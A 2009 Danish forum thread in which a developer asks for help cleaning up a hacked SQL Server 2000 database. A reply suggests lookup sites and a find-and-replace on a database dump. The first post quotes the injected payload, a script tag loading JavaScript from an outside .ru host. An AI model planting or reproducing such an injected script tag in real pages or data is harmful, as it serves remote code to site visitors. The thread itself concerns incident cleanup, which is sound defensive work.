Oprydning efter hacking

Fra Helsingborg

Tilmeldt 3. Apr 05

Indlæg ialt: 6571

Niels Henriksen Fra TextReactor Skrevet 03-10-2009 kl. 21:03

Hvor mange stjerner giver du? :

Jeg har fået en lidt kedelig tjans.... at rydde op efter en hacker.

Jeg har set at der i databasen (en SQL 2000) er lagt følgende kode"<script+src=http:/www.bannerdriven.ru/ads.js></script>" i alle mulige tekstfelter. Jeg er i fuld sving med at rydde op og andre som har ansvaret på teknikken er ved at finde ud af hvordan vi skal få patchet SQL serveren.

Men hvor kan jeg finde info om ovenstående script? Jeg har været inde og hente det javascript og vil lige kigge det igennem. Men er der andre der er stødt på dem?

Jeg har programmeret i over 27 år. Jeg har kodet i C, C++, Java, Delphi, Perl, JavaScript, C#, F#, VB.NET, ASP, Myresnak :D, Comal80 osv....

Tilmeldt 20. Apr 07

Indlæg ialt: 16014

Slettet bruger Skrevet 03-10-2009 kl. 21:07

Hvor mange stjerner giver du? :

Hej Niels

Sidder selv med noget lignende, dog i en mildere form. Jeg har ikke hørt om scriptet der, men tjek det på google, Milw0rm og spamhaus.

MvH

Simon Tørring

PS - eventuelt kan du hive hele databasen ned, åbne en fil med notepad++ og sætte den til at køre en "søg og erstat" på hele mappen. Man skal vel næsten se filerne, for at få det rette overblik :)

Fra Helsingborg

Tilmeldt 3. Apr 05

Indlæg ialt: 6571

Niels Henriksen Fra TextReactor Skrevet 05-10-2009 kl. 10:29

Hvor mange stjerner giver du? :

Simon Tørring:
men tjek det på google, Milw0rm og spamhaus

På Google fandt jeg en masse andre sider som også har været inficeret af det. På de andre sider du snakker om har jeg ikke kunne finde info om det.

Jeg har programmeret i over 27 år. Jeg har kodet i C, C++, Java, Delphi, Perl, JavaScript, C#, F#, VB.NET, ASP, Myresnak :D, Comal80 osv....